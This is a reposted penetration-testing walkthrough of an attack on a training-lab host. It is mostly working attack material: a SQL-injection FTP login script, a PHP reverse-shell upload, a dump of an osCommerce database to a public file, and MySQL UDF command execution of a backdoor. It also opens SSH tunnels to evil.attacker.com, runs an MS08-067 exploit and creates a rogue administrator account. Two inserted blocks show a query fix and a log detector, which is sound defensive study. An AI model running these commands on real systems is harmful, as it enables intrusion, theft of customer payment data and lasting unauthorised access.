HOWTO : Penetration Testing in the Real World

*** Do NOT attack any computer or network without authorization, or you may be put in jail. ***



Credit to : muts (of Offensive Security)



This is muts's work, not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.



Penetration Testing in the Real World from Offensive Security on Vimeo.



ftp-brute.py

#!/usr/bin/python

from ftplib import FTP

print "Attempting user directory discovery via FTP"

# Each iteration injects a different LIMIT offset into the FTP username, so the
# backend SQL query returns a different row of the ftpuser table and the login
# lands in that user's home directory.
for i in range(0, 6):
    username = "%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT " + str(i) + ",1; --  "
    password = "1"
    ftp = FTP('www.offseclabs.com')
    ftp.login(username, password)
    print "Logged in as user " + str(i) + ",1"
    ftp.retrlines('LIST')
    ftp.close()





Commands





Open Terminal A :



nmap -p 21,80 www.offseclabs.com

nc -v www.offseclabs.com 80

HEAD / HTTP/1.0

(To enumerate the webserver)

clear



ftp www.offseclabs.com

username - bob

password - bob

(To enumerate the ftp server)



ftp www.offseclabs.com

username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --  

password - 1



(logged in to the ftp server)

pwd

ls

bye



clear



cd core

clear

nano brute.py --> (see above ftp-brute.py)

./brute.py

(find the fifth user, whose home directory is mapped to the web server's document root)

clear



ftp www.offseclabs.com

username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --  

password - 1



(logged in as the fifth user)

ls

put rs.php --> (a reverse php shell)
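The injection above works because the FTP server's authentication backend splices the supplied username straight into its SQL text. The following is an added example, not part of muts's walkthrough: an assumed vulnerable lookup (query shape inferred from the `%')` prefix of the payload) beside a hardened form that validates the account name and binds parameters, both run against a constructed in-memory SQLite stand-in for the ftpuser table.

```python
import re
import sqlite3

# Constructed stand-in for the MySQL 'ftpuser' table the FTP server authenticates
# against (names, uids and paths are made up; passwords kept plain for brevity).
SAMPLE_USERS = [
    ("bob",   "bob",  1001, 1001, "/home/ftp/bob",   "/bin/false"),
    ("alice", "s3cr", 1002, 1002, "/home/ftp/alice", "/bin/false"),
    ("www",   "x9!q", 33,   33,   "/var/www",        "/bin/false"),
]
# The walkthrough's injected username, with the LIMIT offset fixed at 0.
PAGE_PAYLOAD = "%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 0,1; --  "

COLUMNS = "username,password,uid,gid,homedir,shell"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ftpuser (%s)" % COLUMNS)
    conn.executemany("INSERT INTO ftpuser VALUES (?,?,?,?,?,?)", SAMPLE_USERS)
    return conn

def lookup_unsafe(conn, username, password):
    # Assumed shape of the vulnerable backend query: values spliced into the SQL,
    # so the %') in the payload closes the LIKE and the rest is parsed as SQL.
    sql = ("SELECT %s FROM ftpuser WHERE (username LIKE '%s') AND password = '%s'"
           % (COLUMNS, username, password))
    return conn.execute(sql).fetchone()

# Allowlist for account names; anything with quotes, spaces or SQL keywords fails.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")

def lookup_safe(conn, username, password):
    # Hardened form: reject anything that is not a plausible account name, then
    # bind the values as parameters so they can never be parsed as SQL.
    if not USERNAME_RE.fullmatch(username):
        return None
    return conn.execute(
        "SELECT %s FROM ftpuser WHERE username = ? AND password = ?" % COLUMNS,
        (username, password)).fetchone()
```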



-----------------------

Open Terminal B :



nc -lvp 80



-----------------------

Open Terminal C :



wget www.offseclabs.com/rs.php



(Then, at Terminal B, we got a reverse shell)



-----------------------

Go back to Terminal B :

(inside the reverse shell)



/sbin/ifconfig

pwd

cd /var/www

ls -la

cd includes

cat configure.php

(get the MySQL username and password as well as MySQL server address and database name)



mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt



------------------------

Open a Firefox :



www.offseclabs.com/images/ccdump.txt

(we got the database dump)



-------------------------

Go back to Terminal A :



(inside the ftp server)

put up.html --> (file upload html file)

put up.php --> (file upload php file)



-------------------------

Open Firefox :



www.offseclabs.com/up.html



(upload lib_mysqludf_sys.so and mark it as 1)

(upload rs, a binary reverse shell, and mark it as 2)



** Details of lib_mysqludf_sys.so



---------------------------

Go back to Terminal A :



(quit the ftp server)

bye

clear

exit

(quit Terminal A)



----------------------------

Go back to Terminal B :



mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5

(login to MySQL server)

use pwn;

SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';

SELECT imgdata from binfile where title="2" into dumpfile '/tmp/bd';



CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';

CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';

CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';

CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';

CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';



SELECT sys_eval('chmod 755 /tmp/bd');

SELECT sys_eval('/tmp/bd &');

(don't press Enter at this moment)
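From the defender's side, the sequence above (SELECT ... INTO DUMPFILE into a library directory, then CREATE FUNCTION ... SONAME, then sys_eval) is a recognisable pattern in the MySQL general query log. This is an added example, not from the video: it runs three rules over constructed log lines (the line format and connection ids are made up) and reports connections that both wrote a file through SQL and loaded a UDF.

```python
import re

# Constructed MySQL general-log style lines (not real server output); the
# statements are the ones the walkthrough issues through the stolen root login.
SAMPLE_LOG = """\
2009-01-01T10:00:01Z  12 Connect   root@10.150.0.5 on
2009-01-01T10:00:02Z  12 Query     use pwn
2009-01-01T10:00:05Z  12 Query     SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so'
2009-01-01T10:00:06Z  12 Query     SELECT imgdata from binfile where title="2" into dumpfile '/tmp/bd'
2009-01-01T10:00:09Z  12 Query     CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so'
2009-01-01T10:00:12Z  12 Query     SELECT sys_eval('chmod 755 /tmp/bd')
2009-01-01T10:00:30Z  13 Query     SELECT name, price FROM products WHERE id = 7
"""

# timestamp, connection id, command type, argument
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")

RULES = [
    ("file_write", re.compile(r"\bINTO\s+(DUMP|OUT)FILE\b", re.I)),   # SQL writing files
    ("udf_load",   re.compile(r"\bCREATE\s+FUNCTION\b.*\bSONAME\b", re.I)),  # loading a shared object
    ("udf_exec",   re.compile(r"\bsys_(eval|exec)\s*\(", re.I)),      # OS commands via the UDF
]

def scan_queries(log_text):
    """Return (conn_id, rule_name, statement) for every Query line matching a rule."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        for name, pattern in RULES:
            if pattern.search(m.group("arg")):
                hits.append((int(m.group("conn")), name, m.group("arg")))
    return hits

def udf_chain_connections(log_text):
    """Connection ids that both wrote a file and loaded a UDF: the escalation chain above."""
    seen = {}
    for conn, rule, _ in scan_queries(log_text):
        seen.setdefault(conn, set()).add(rule)
    return {c for c, rules in seen.items() if {"file_write", "udf_load"} <= rules}
```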



---------------------------

Open Terminal D :



nc -lvp 80



(go back to Terminal B and press Enter; you will get a reverse shell at Terminal D)



----------------------------

Open Terminal E :



nc -lvp 80



----------------------------

Go back to Terminal B :



(inside the MySQL server)

SELECT sys_eval('/tmp/bd &');



(press enter and we got another reverse shell at Terminal E)



---------------------------

Go back to Terminal E :



(inside the reverse shell)

ping -c 1 10.150.0.20

clear



ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com

(create a remote tunnel at port 445)



-----------------------------

Open Terminal F :



netstat -antp

nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse



-----------------------------

Go back to Terminal D :



ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com

(create a remote tunnel at port 4444)



clear



------------------------------

Go back to Terminal F :



cd core

nano nx.py --> (a ms08-067 python exploit for win2k3 sp2)

clear

./nx.py 127.0.0.1

nc -v 127.0.0.1 4444



(we got a remote shell of 10.150.0.20)

ipconfig

net user hacker hacker /add

net localgroup administrators hacker /add



---------------------------------

Go back to Terminal D :



(quit the tunnel)

exit

clear



ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com

(create another remote tunnel on port 3389)

clear



-----------------------------------

Open Terminal G :



netstat -antp | grep LISTEN

clear

rdesktop 127.0.0.1



(login to the 10.150.0.20 with username - hacker and password - hacker)





That's all! See you.